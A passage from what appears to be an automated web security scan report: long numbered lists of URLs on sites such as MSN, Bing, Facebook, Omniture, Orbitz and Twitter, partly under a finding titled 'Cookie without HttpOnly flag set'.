11.241. http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx

11.242. http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx

11.243. http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx

11.244. http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx

11.245. http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx

11.246. http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx

11.247. http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx

11.248. http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx

11.249. http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx

11.250. http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx

11.251. http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx

11.252. http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx

11.253. http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx

11.254. http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx

11.255. http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx

11.256. http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx

11.257. http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx

11.258. http://specials.msn.com/IEIncreaseFont_preview.aspx

11.259. http://specials.msn.com/alphabet.aspx

11.260. http://sync.mathtag.com/sync/img

11.261. http://t.invitemedia.com/track_imp

11.262. http://tags.bluekai.com/site/1463

11.263. http://tags.bluekai.com/site/2748

11.264. http://track.roiservice.com/track/track.aspx

11.265. http://tracking.tree.com/trk/npv-event.gif

11.266. http://tracking.tree.com/trk/pv.gif

11.267. http://translate.google.com/translate_t

11.268. http://tv.msn.com/

11.269. http://tv.msn.com/last-night-on-tv/

11.270. http://tv.msn.com/tv/article.aspx

11.271. http://video.google.com/videosearch

11.272. http://vs.dmtracker.com/tags/vs.js

11.273. http://w.ic.tynt.com/b/o

11.274. http://www.bing.com/

11.275. http://www.bing.com/images/results.aspx

11.276. http://www.bing.com/local/ypdefault.aspx

11.277. http://www.bing.com/maps/

11.278. http://www.bing.com/maps/default.aspx

11.279. http://www.bing.com/maps/explore/

11.280. http://www.bing.com/news/results.aspx

11.281. http://www.bing.com/news/search

11.282. http://www.bing.com/news/search

11.283. http://www.bing.com/results.aspx

11.284. http://www.bing.com/search

11.285. http://www.bing.com/shopping

11.286. http://www.bing.com/shopping/pet-beds/c/5533

11.287. http://www.bing.com/shopping/photo-storage-presentation/search

11.288. http://www.bing.com/shopping/search

11.289. http://www.bing.com/shopping/televisions/c/4724

11.290. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

11.291. http://www.bing.com/shopping/womens-workout-clothing/r/146

11.292. http://www.bing.com/travel/content/search

11.293. http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do

11.294. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

11.295. http://www.bing.com/travel/hotels

11.296. http://www.bing.com/videos/browse

11.297. http://www.bing.com/videos/results.aspx

11.298. http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j

11.299. http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj

11.300. http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7

11.301. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

11.302. http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k

11.303. http://www.capitalone.com/creditcards/orbitz/index.php

11.304. http://www.cheaptickets.com/

11.305. http://www.demandstudios.com/ehow-writers.html

11.306. http://www.ehow.com/

11.307. http://www.facebook.com/

11.308. http://www.facebook.com/

11.309. http://www.facebook.com/%s

11.310. http://www.facebook.com/2008/fbml

11.311. http://www.facebook.com/MillenniumHotels

11.312. http://www.facebook.com/ajax/intl/language_dialog.php

11.313. http://www.facebook.com/ajax/reg_birthday_help.php

11.314. http://www.facebook.com/badges

11.315. http://www.facebook.com/btaylor

11.316. http://www.facebook.com/campaign/impression.php

11.317. http://www.facebook.com/campaign/landing.php

11.318. http://www.facebook.com/careers/

11.319. http://www.facebook.com/developers

11.320. http://www.facebook.com/directory/pages/

11.321. http://www.facebook.com/directory/people/

11.322. http://www.facebook.com/facebook

11.323. http://www.facebook.com/find-friends

11.324. http://www.facebook.com/help/

11.325. http://www.facebook.com/ligatt

11.326. http://www.facebook.com/mobile

11.327. http://www.facebook.com/omniture

11.328. http://www.facebook.com/orbitz

11.329. http://www.facebook.com/pages/blekko/316217594002

11.330. http://www.facebook.com/platform

11.331. http://www.facebook.com/policy.php

11.332. http://www.facebook.com/privacy/explanation.php

11.333. http://www.facebook.com/r.php

11.334. http://www.facebook.com/recover.php

11.335. http://www.facebook.com/terms.php

11.336. https://www.facebook.com/

11.337. https://www.facebook.com/2008/fbml

11.338. https://www.facebook.com/login.php

11.339. http://www.google.com/finance

11.340. http://www.google.com/setprefs

11.341. http://www.msn.com/

11.342. http://www.omniture.com/de

11.343. http://www.omniture.com/en

11.344. http://www.omniture.com/en/

11.345. http://www.omniture.com/en/community

11.346. http://www.omniture.com/en/community/blogs

11.347. http://www.omniture.com/en/community/events

11.348. http://www.omniture.com/en/community/usergroups

11.349. http://www.omniture.com/en/company/adobe_faq

11.350. http://www.omniture.com/en/company/analyst_insight

11.351. http://www.omniture.com/en/company/customers

11.352. http://www.omniture.com/en/company/press_room

11.353. http://www.omniture.com/en/company/press_room/awards

11.354. http://www.omniture.com/en/company/press_room/news

11.355. http://www.omniture.com/en/company/press_room/press_releases

11.356. http://www.omniture.com/en/contact

11.357. http://www.omniture.com/en/contact/company

11.358. http://www.omniture.com/en/contact/email

11.359. http://www.omniture.com/en/contact/feedback

11.360. http://www.omniture.com/en/contact/offices

11.361. http://www.omniture.com/en/contact/sales

11.362. http://www.omniture.com/en/contact/support

11.363. http://www.omniture.com/en/education

11.364. http://www.omniture.com/en/education/academic_initiative

11.365. http://www.omniture.com/en/education/certification

11.366. http://www.omniture.com/en/education/certification/implementation

11.367. http://www.omniture.com/en/education/certification/insight_analyst

11.368. http://www.omniture.com/en/education/certification/insight_architect

11.369. http://www.omniture.com/en/education/certification/search_center

11.370. http://www.omniture.com/en/education/certification/site_catalyst

11.371. http://www.omniture.com/en/education/certification/support

11.372. http://www.omniture.com/en/education/certification/test_target

11.373. http://www.omniture.com/en/education/courses

11.374. http://www.omniture.com/en/education/courses/discover

11.375. http://www.omniture.com/en/education/courses/dop_analyst

11.376. http://www.omniture.com/en/education/courses/merchandising

11.377. http://www.omniture.com/en/education/courses/online_marketing_suite

11.378. http://www.omniture.com/en/education/courses/sbu

11.379. http://www.omniture.com/en/education/courses/searchcenter

11.380. http://www.omniture.com/en/education/courses/sitesearch

11.381. http://www.omniture.com/en/education/courses/survey

11.382. http://www.omniture.com/en/education/courses/testandtarget

11.383. http://www.omniture.com/en/partners

11.384. http://www.omniture.com/en/partners/apply

11.385. http://www.omniture.com/en/partners/portal

11.386. http://www.omniture.com/en/partners/showcase

11.387. http://www.omniture.com/en/privacy

11.388. http://www.omniture.com/en/privacy/2o7

11.389. http://www.omniture.com/en/privacy/policy

11.390. http://www.omniture.com/en/privacy/product

11.391. http://www.omniture.com/en/privacy/visualsciences

11.392. http://www.omniture.com/en/privacy/visualsciences/policy

11.393. http://www.omniture.com/en/privacy/visualsciences/resources

11.394. http://www.omniture.com/en/privacy/visualsciences/terms

11.395. http://www.omniture.com/en/product_tours/form

11.396. http://www.omniture.com/en/products/conversion

11.397. http://www.omniture.com/en/products/conversion/merchandising

11.398. http://www.omniture.com/en/products/conversion/publish

11.399. http://www.omniture.com/en/products/conversion/recommendations

11.400. http://www.omniture.com/en/products/conversion/searchandpromote

11.401. http://www.omniture.com/en/products/conversion/survey

11.402. http://www.omniture.com/en/products/conversion/testandtarget

11.403. http://www.omniture.com/en/products/conversion/testandtarget11

11.404. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing

11.405. http://www.omniture.com/en/products/marketing_integration/genesis

11.406. http://www.omniture.com/en/products/marketing_integration/genesis/applications

11.407. http://www.omniture.com/en/products/multichannel_analytics

11.408. http://www.omniture.com/en/products/multichannel_analytics/insight

11.409. http://www.omniture.com/en/products/multichannel_analytics/insight_retail

11.410. http://www.omniture.com/en/products/online_analytics

11.411. http://www.omniture.com/en/products/online_analytics/digitalpulse

11.412. http://www.omniture.com/en/products/online_analytics/discover

11.413. http://www.omniture.com/en/products/online_analytics/sitecatalyst

11.414. http://www.omniture.com/en/products/online_business_optimization

11.415. http://www.omniture.com/en/products/online_marketing_suite

11.416. http://www.omniture.com/en/products/open_business_analytics_platform

11.417. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse

11.418. http://www.omniture.com/en/products/tours

11.419. http://www.omniture.com/en/products/visitor_acquisition

11.420. http://www.omniture.com/en/products/visitor_acquisition/searchcenter

11.421. http://www.omniture.com/en/resources

11.422. http://www.omniture.com/en/resources/articles

11.423. http://www.omniture.com/en/resources/case_studies

11.424. http://www.omniture.com/en/resources/cmo.com

11.425. http://www.omniture.com/en/resources/guides

11.426. http://www.omniture.com/en/resources/testimonials

11.427. http://www.omniture.com/en/resources/webinars

11.428. http://www.omniture.com/en/services

11.429. http://www.omniture.com/en/services/consulting

11.430. http://www.omniture.com/en/services/es

11.431. http://www.omniture.com/en/survey/5084

11.432. http://www.omniture.com/en/surveys

11.433. http://www.omniture.com/es

11.434. http://www.omniture.com/fr

11.435. http://www.omniture.com/jp

11.436. http://www.omniture.com/ko

11.437. http://www.omniture.com/offer/100

11.438. http://www.omniture.com/offer/101

11.439. http://www.omniture.com/offer/102

11.440. http://www.omniture.com/offer/107

11.441. http://www.omniture.com/offer/108

11.442. http://www.omniture.com/offer/158

11.443. http://www.omniture.com/offer/162

11.444. http://www.omniture.com/offer/17

11.445. http://www.omniture.com/offer/170

11.446. http://www.omniture.com/offer/186

11.447. http://www.omniture.com/offer/187

11.448. http://www.omniture.com/offer/191

11.449. http://www.omniture.com/offer/285

11.450. http://www.omniture.com/offer/286

11.451. http://www.omniture.com/offer/291

11.452. http://www.omniture.com/offer/301

11.453. http://www.omniture.com/offer/303

11.454. http://www.omniture.com/offer/323

11.455. http://www.omniture.com/offer/331

11.456. http://www.omniture.com/offer/335

11.457. http://www.omniture.com/offer/337

11.458. http://www.omniture.com/offer/357

11.459. http://www.omniture.com/offer/372

11.460. http://www.omniture.com/offer/400

11.461. http://www.omniture.com/offer/411

11.462. http://www.omniture.com/offer/412

11.463. http://www.omniture.com/offer/413

11.464. http://www.omniture.com/offer/427

11.465. http://www.omniture.com/offer/429

11.466. http://www.omniture.com/offer/435

11.467. http://www.omniture.com/offer/462

11.468. http://www.omniture.com/offer/704

11.469. http://www.omniture.com/offer/892

11.470. http://www.omniture.com/offer/987

11.471. http://www.omniture.com/offer/989

11.472. http://www.omniture.com/press/867

11.473. http://www.omniture.com/press/868

11.474. http://www.omniture.com/zh

11.475. http://www.orbitz.com/

11.476. http://www.orbitz.com/App/DPTLandingPageSearch

11.477. http://www.orbitz.com/App/DisplayCarSearch

11.478. http://www.orbitz.com/App/GDDC

11.479. http://www.orbitz.com/App/Home

11.480. http://www.orbitz.com/App/InitDealEdit

11.481. http://www.orbitz.com/App/PartnerTracking

11.482. http://www.orbitz.com/App/PerformMDLPDealsContent

11.483. http://www.orbitz.com/App/PrepareActivitiesHome

11.484. http://www.orbitz.com/App/PrepareDealsHome

11.485. http://www.orbitz.com/App/PrepareFlightsTab

11.486. http://www.orbitz.com/App/PrepareFlightsTab&type=el_dp

11.487. http://www.orbitz.com/App/PrepareSearchResult

11.488. http://www.orbitz.com/App/PrepareVacationsHome

11.489. http://www.orbitz.com/App/Sitemap

11.490. http://www.orbitz.com/App/SubmitQuickSearch

11.491. http://www.orbitz.com/App/ViewDHTMLCalendar

11.492. http://www.orbitz.com/App/ViewHotelSearch

11.493. http://www.orbitz.com/App/ViewMyAccount

11.494. http://www.orbitz.com/App/ViewRSSHelpPage

11.495. http://www.orbitz.com/App/ViewRoundTripSearch

11.496. http://www.orbitz.com/App/ViewTravelWatchHome

11.497. http://www.orbitz.com/hotels/

11.498. https://www.orbitz.com/Secure/SignIn

11.499. https://www.orbitz.com/Secure/ViewSecureCalendar

11.500. https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile

11.501. http://www.parentsconnect.com/flux/login_sync.jhtml

11.502. http://www.parentsconnect.com/flux/widgetRedirect.jhtml

11.503. http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html

11.504. http://www.websitetoolbox.com/tool/view/mb/file

11.505. http://www.worldmastiffforum.com/

11.506. http://www.worldmastiffforum.com/file

11.507. http://www.youtube.com/user/sqlrtfm

11.508. http://xcdn.xgraph.net/15530/db/xg.gif

12. Cookie without HttpOnly flag set

12.1. https://admin.testandtarget.omniture.com/

12.2. https://admin.testandtarget.omniture.com/a

12.3. https://admin.testandtarget.omniture.com/errors/browser_unsupported.jsp

12.4. https://admin.testandtarget.omniture.com/login

12.5. https://admin.testandtarget.omniture.com/login_hal.css

12.6. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js

12.7. https://admin.testandtarget.omniture.com/skins/omniture/login.css

12.8. https://admin.testandtarget.omniture.com/skins/omniture/static_header.css

12.9. https://admin.testandtarget.omniture.com/user/forgot_password.jsp

12.10. http://advertising.aol.com/privacy/advertisingcom/opt-out

12.11. http://amihackerproof.com/

12.12. http://blekko.com/

12.13. http://blekko.com/ws/http:/2mdn.net/%20/domain

12.14. http://blogs.ittoolbox.com/pm/ppm

12.15. http://boardreader.com/moduleindex.php

12.16. http://brothercake.com/site/resources/scripts/onload/

12.17. http://bugs.jquery.com/ticket/7509

12.18. https://careers.microsoft.com/

12.19. http://ccc01.opinionlab.com/comment_card.asp

12.20. http://ccc01.opinionlab.com/o.asp

12.21. http://clickaider.com/

12.22. http://corp.orbitz.com/

12.23. http://corp.orbitz.com/careers

12.24. http://corp.orbitz.com/partnerships/advertise.html

12.25. http://corp.orbitz.com/partnerships/affiliates.html

12.26. http://cruises.orbitz.com/

12.27. http://dating.msn.com/index.aspx

12.28. http://dating.msn.com/search/index.aspx

12.29. http://dev.twitter.com/

12.30. https://faq.orbitz.com/

12.31. https://faq.orbitz.com/app/answers/detail/a_id/15644

12.32. http://games.msn.com/

12.33. http://hackergearonline.com/

12.34. http://ie6funeral.com/

12.35. http://inforavel.com/ad_type.php

12.36. http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html

12.37. http://leads.demandbase.com/

12.38. http://m.twitter.com/

12.39. http://mad4milk.net/

12.40. http://nationalcybersecurity.com/

12.41. http://outsideonline.com/

12.42. http://pressroom.orbitz.com/

12.43. https://secure.avangate.com/order/checkout.php

12.44. http://solutions.liveperson.com/ref/lppb.asp

12.45. http://sorry.google.com/sorry/Captcha

12.46. http://spoofem.com/

12.47. http://trw.com/

12.48. http://trw.mediaroom.com/index.php

12.49. http://twitter.com/

12.50. http://twitter.com/BWBLLC

12.51. http://twitter.com/BW_Technology

12.52. http://twitter.com/Chester_Pitts

12.53. http://twitter.com/Cirque

12.54. http://twitter.com/JetBlue

12.55. http://twitter.com/JohnsHopkinsSPH

12.56. http://twitter.com/McKQuarterly

12.57. http://twitter.com/MomsWhoSave

12.58. http://twitter.com/NetworkConnects

12.59. http://twitter.com/Nightline

12.60. http://twitter.com/NoReservations

12.61. http://twitter.com/NylonMag

12.62. http://twitter.com/OmnitureEMEA

12.63. http://twitter.com/PeaceCorps

12.64. http://twitter.com/Support

12.65. http://twitter.com/TakeoSpikes51

12.66. http://twitter.com/TomorrowCounsel

12.67. http://twitter.com/VirginiaBeachWk

12.68. http://twitter.com/Wyome655

12.69. http://twitter.com/about

12.70. http://twitter.com/about/contact

12.71. http://twitter.com/about/resources

12.72. http://twitter.com/account/complete

12.73. http://twitter.com/account/resend_password

12.74. http://twitter.com/arnui

12.75. http://twitter.com/ashleytisdale

12.76. http://twitter.com/best_golf

12.77. http://twitter.com/business

12.78. http://twitter.com/buyantsogtoo

12.79. http://twitter.com/chain_llc

12.80. http://twitter.com/chain_llc_cod

12.81. http://twitter.com/chain_llc_mg

12.82. http://twitter.com/cloudscan

12.83. http://twitter.com/coolmompicks

12.84. http://twitter.com/davidgregory

12.85. http://twitter.com/designmilk

12.86. http://twitter.com/donlomb

12.87. http://twitter.com/favorites/toptweets.json

12.88. http://twitter.com/gamespot

12.89. http://twitter.com/home

12.90. http://twitter.com/jasmith579

12.91. http://twitter.com/jobs4writers

12.92. http://twitter.com/ligatt

12.93. http://twitter.com/lijobs_sales

12.94. http://twitter.com/login

12.95. http://twitter.com/millenniumpr

12.96. http://twitter.com/newtwitter

12.97. http://twitter.com/omniture

12.98. http://twitter.com/omniturecare

12.99. http://twitter.com/orbitz

12.100. http://twitter.com/privacy

12.101. http://twitter.com/prolawrssfeed

12.102. http://twitter.com/qianam

12.103. http://twitter.com/rosyresources

12.104. http://twitter.com/sarahdessen

12.105. http://twitter.com/science

12.106. http://twitter.com/scribe

12.107. http://twitter.com/search

12.108. http://twitter.com/sessions/change_locale

12.109. http://twitter.com/sethmeyers21

12.110. http://twitter.com/share

12.111. http://twitter.com/signup

12.112. http://twitter.com/sp_arizona

12.113. http://twitter.com/sp_oregon

12.114. http://twitter.com/sp_tx

12.115. http://twitter.com/toptweets/favorites

12.116. http://twitter.com/tos

12.117. http://twitter.com/widgets

12.118. https://twitter.com/

12.119. https://twitter.com/about

12.120. https://twitter.com/about/contact

12.121. https://twitter.com/about/resources

12.122. https://twitter.com/account/complete

12.123. https://twitter.com/account/resend_password

12.124. https://twitter.com/login

12.125. https://twitter.com/privacy

12.126. https://twitter.com/sessions

12.127. https://twitter.com/sessions/change_locale

12.128. https://twitter.com/sessions/destroy

12.129. https://twitter.com/signup

12.130. https://twitter.com/tos

12.131. http://updates.orbitz.com/

12.132. http://updates.orbitz.com/flight_status

12.133. http://www.amihackerproof.com/

12.134. http://www.answerbag.com/

12.135. https://www.astaro.co.uk/beacon/(beid

12.136. https://www.astaro.com/beacon/(beid)/06oa3arq6oafh8mmgccr289cup83h1

12.137. https://www.astaro.com/beacon/(beid)/0mgc3arq6oafh8mmgccr289cup83h1

12.138. https://www.astaro.com/user/login

12.139. https://www.astaro.de/beacon/(beid

12.140. http://www.astaro.es/

12.141. https://www.astaro.net/beacon/(beid

12.142. http://www.autocheck.com/

12.143. http://www.bbbonline.org/cks.asp

12.144. http://www.benjaminsterling.com/experiments/jqShuffle/

12.145. http://www.bing.com/travel/

12.146. http://www.bing.com/travel/content/search

12.147. http://www.bing.com/travel/deals/airline-ticket-deals.do

12.148. http://www.cafemom.com/group/416

12.149. http://www.cafemom.com/group/46574

12.150. http://www.directstartv.com/

12.151. http://www.ebookers.com/

12.152. http://www.faneuilhallmarketplace.com/

12.153. http://www.gorp.com/

12.154. http://www.hotelclub.com/

12.155. http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/

12.156. http://www.kampyle.com/

12.157. http://www.ligattsecurity.com/

12.158. http://www.livestrong.com/

12.159. http://www.milleniumdental.net/

12.160. http://www.mywot.com/en/scorecard/2mdn.net

12.161. http://www.opensource.org/licenses/gpl-license.php

12.162. http://www.opensource.org/licenses/mit-license.php

12.163. http://www.opinionlab.com/ozone/24-7.asp

12.164. http://www.orbitz.com/flight-info/

12.165. http://www.orbitz.com/hotels/

12.166. http://www.orbitz.com/hotels/

12.167. http://www.orbitz.com/hotels/Canada--ON/Toronto/

12.168. http://www.orbitz.com/hotels/France/Nice/

12.169. http://www.orbitz.com/hotels/France/Paris/

12.170. http://www.orbitz.com/hotels/Mexico/

12.171. http://www.orbitz.com/hotels/Mexico/Cancun/

12.172. http://www.orbitz.com/hotels/Mexico/Playa_Del_Carmen/

12.173. http://www.orbitz.com/hotels/United_Kingdom/London/

12.174. http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/

12.175. http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/%20

12.176. http://www.orbitz.com/hotels/United_States--CA/San_Diego/

12.177. http://www.orbitz.com/hotels/United_States--CA/San_Francisco/

12.178. http://www.orbitz.com/hotels/United_States--FL/Miami/

12.179. http://www.orbitz.com/hotels/United_States--FL/Orlando/

12.180. http://www.orbitz.com/hotels/United_States--IL/Chicago/

12.181. http://www.orbitz.com/hotels/United_States--NV/Las_Vegas/

12.182. http://www.orbitz.com/hotels/United_States--NY/New_York/

12.183. http://www.orbitz.com/trips/writeReview

12.184. https://www.orbitz.com/account/login

12.185. https://www.orbitz.com/account/registration

12.186. https://www.orbitz.com/trips/writeReview

12.187. http://www.parentsconnect.com/flux/login_sync.jhtml

12.188. http://www.parentsconnect.com/flux/widgetRedirect.jhtml

12.189. http://www.pctools.com/free-antivirus/

12.190. http://www.ratedesi.com/

12.191. http://www.ratestogo.com/

12.192. http://www.thespanner.co.uk/2009/03/25/xss-rays/

12.193. http://www.thespanner.co.uk/feed/

12.194. http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html

12.195. http://www.trw.com/

12.196. http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/

12.197. http://www.webveteran.com/

12.198. http://www.wordpresstemplates.com/

12.199. http://a.intentmedia.net/adServer/clicks

12.200. http://a.intentmedia.net/adServer/impressions

12.201. http://a9.com/-/spec/opensearch/1.1/

12.202. http://ad-emea.doubleclick.net/click

12.203. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59

12.204. http://ad.doubleclick.net/ad/N553.126834.KONTERATECHNOLOGIES/B5039995

12.205. http://ad.doubleclick.net/adi/N3285.google/B2343920.91

12.206. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3

12.207. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4

12.208. http://ad.doubleclick.net/adi/dmd.ehow/homepage

12.209. http://ad.doubleclick.net/adj/dmd.ehow/gen

12.210. http://ad.doubleclick.net/click

12.211. http://ad.doubleclick.net/clk

12.212. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1392708374

12.213. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1496386082

12.214. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/822821502

12.215. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213**

12.216. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295**

12.217. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

12.218. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/971.560.tk.100x25/318849087

12.219. http://ad.yieldmanager.com/iframe3

12.220. http://ad.yieldmanager.com/imp

12.221. http://ad.yieldmanager.com/pixel

12.222. http://adclick.g.doubleclick.net/aclk

12.223. http://ads.adbrite.com/adserver/vdi/762701

12.224. http://ads.revsci.net/adserver/ako

12.225. https://adwords.google.com/select/Login

12.226. http://api.bizographics.com/v1/profile.json

12.227. http://b.scorecardresearch.com/b

12.228. http://blog.facebook.com/blog.php

12.229. http://blog.orbitz.com/

12.230. http://blogsearch.google.com/blogsearch

12.231. http://books.google.com/

12.232. http://books.google.com/books

12.233. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

12.234. http://businessonmain.msn.com/browseresources/articles/firststeps.aspx

12.235. http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx

12.236. http://businessonmain.msn.com/questions/default.aspx

12.237. http://businessonmain.msn.com/videos/coolrunnings.aspx

12.238. http://c.chango.com/collector/tag.js

12.239. http://c.statcounter.com/t.php

12.240. http://cdn-sitelife.ehow.com/ver1.0/Direct/DirectProxy

12.241. http://cms.ad.yieldmanager.net/v1/cms

12.242. http://code.google.com/apis/maps/terms.html

12.243. http://code.google.com/p/swfobject/

12.244. http://code.google.com/p/swfobject/wiki/documentation

12.245. http://consumershealthyliving.com/clinical-study.html

12.246. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js

12.247. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13r09h5ct/*http:/ad.yieldmanager.com/imp

12.248. http://cspix.media6degrees.com/orbserv/hbpix

12.249. http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif

12.250. http://ctix8.cheaptickets.com/dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif

12.251. http://ctix8.cheaptickets.com/dcsza35es100004br3bqwfzxk_6e6k/dcs.gif

12.252. http://deals.msn.com/

12.253. http://developer.yahoo.com/yui/compressor/

12.254. http://developers.facebook.com/plugins/

12.255. http://dlvr.it/Djx2v

12.256. http://dlvr.it/Djx6x

12.257. http://dm.demdex.net/pixel/10236

12.258. http://dpm.demdex.net/demdot.jpg

12.259. http://ds.addthis.com/red/psi/p.json

12.260. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json

12.261. http://edge.quantserve.com/quant.js

12.262. http://editorial.autos.msn.com/articles/default.aspx

12.263. http://editorial.autos.msn.com/blogs/autosblog.aspx

12.264. http://editorial.autos.msn.com/media/default.aspx

12.265. http://editorial.autos.msn.com/media/video/default.aspx

12.266. http://editorial.autos.msn.com/new-cars/default.aspx

12.267. http://editorial.autos.msn.com/used-cars/default.aspx

12.268. http://entertainment.msn.com/

12.269. http://entertainment.msn.com/news/

12.270. http://entertainment.msn.com/video/

12.271. http://google.com/safebrowsing/diagnostic

12.272. http://gorp.away.com/

12.273. http://goto.ext.google.com/og-dogfood-issue

12.274. http://goto.ext.google.com/og-exp

12.275. http://groups.google.com/groups

12.276. http://health.msn.com/

12.277. http://health.msn.com/health-topics/quit-smoking/articlepage.aspx

12.278. http://hit.clickaider.com/clickaider.js

12.279. http://hit.clickaider.com/pv

12.280. http://i.simpli.fi/dpx.js

12.281. http://image2.pubmatic.com/AdServer/Pug

12.282. http://images.google.com/images

12.283. http://info.yahoo.com/w3c/p3p.xml

12.284. http://jdn.monster.com/render/adserverclick.aspx

12.285. http://js.revsci.net/gateway/gw.js

12.286. http://khm0.google.com/kh/v/x3d78/x26

12.287. http://khm1.google.com/kh/v/x3d78/x26

12.288. http://khmdb0.google.com/kh

12.289. http://khmdb1.google.com/kh

12.290. http://kona32.kontera.com/KonaGet.js

12.291. http://latino.msn.com/

12.292. http://lifestyle.msn.com/

12.293. http://lifestyle.msn.com/relationships/

12.294. http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx

12.295. http://lifestyle.msn.com/relationships/your-money-today/article.aspx

12.296. http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx

12.297. http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx

12.298. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx

12.299. http://lifestyle.msn.com/your-look/

12.300. http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx

12.301. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx

12.302. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx

12.303. http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx

12.304. http://local.msn.com/

12.305. http://local.msn.com/hourly.aspx

12.306. http://local.msn.com/movies-events.aspx

12.307. http://local.msn.com/news.aspx

12.308. http://local.msn.com/restaurants.aspx

12.309. http://local.msn.com/sports.aspx

12.310. http://local.msn.com/ten-day.aspx

12.311. http://local.msn.com/weather.aspx

12.312. https://login.facebook.com/help/

12.313. https://login.facebook.com/login.php

12.314. http://login.live.com/login.srf

12.315. https://login.live.com/login.srf

12.316. https://maps-api-ssl.google.com/maps

12.317. http://media.fastclick.net/w/tre

12.318. http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239

12.319. http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239

12.320. http://movies.msn.com/

12.321. http://movies.msn.com/movies/article.aspx

12.322. http://movies.msn.com/new-on-dvd/movies/

12.323. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

12.324. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

12.325. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/

12.326. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

12.327. http://movies.msn.com/showtimes/showtimes.aspx

12.328. http://movies.msn.com/the-rundown/the-guard/story_5/

12.329. http://mt2.google.com/mapstt

12.330. http://mt3.google.com/mapstt

12.331. http://music.msn.com/

12.332. http://music.msn.com/music/article.aspx

12.333. http://my.msn.com/

12.334. http://my.omniture.com/

12.335. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Lendingtree/Retargeting_Homepage_Nonsecure@Bottom3

12.336. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697

